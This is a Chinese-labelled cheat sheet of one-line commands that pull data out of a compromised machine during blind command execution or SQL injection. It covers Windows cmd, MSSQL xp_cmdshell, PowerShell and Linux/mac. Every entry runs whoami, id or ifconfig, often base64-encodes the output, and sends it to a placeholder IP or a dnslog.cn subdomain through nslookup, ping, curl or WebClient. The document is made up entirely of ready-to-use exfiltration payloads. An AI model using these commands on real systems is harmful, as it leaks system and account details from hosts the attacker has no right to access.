1. windows 命令行:
cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.dnslog.cn && nslookup !FINAL!"
2. mssql:
exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.dnslog.cn %26%26 ping !FINAL!""";
exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";
3. windows 通过start外带
for /F %X in ('whoami') do start http://xx.xx.xx.xx:80/%X
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xx.dnslog.cn
4. windows powershell
for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xx.xx.xx.xx/'+$a);
5. linux/mac 通过ping
ping -c 1 $(whoami).xxx.dnslog.cn
6. linux/mac 通过ping+base64
ping -c 1 $(whoami|base64).xxx.dnslog.cn
7. linux/mac 通过curl
curl http://xx.xx.xx.xx/$(whoami)
curl http://$(whoami).xx.dnslog.cn
8. linux/mac 通过curl+base64
curl http://xx.xx.xx.xx/$(id|base64)
curl http://$(id|base64).xx.dnslog.cn
curl http://xx.xx.xx.xx/$(ifconfig|base64|tr '\n' '-')
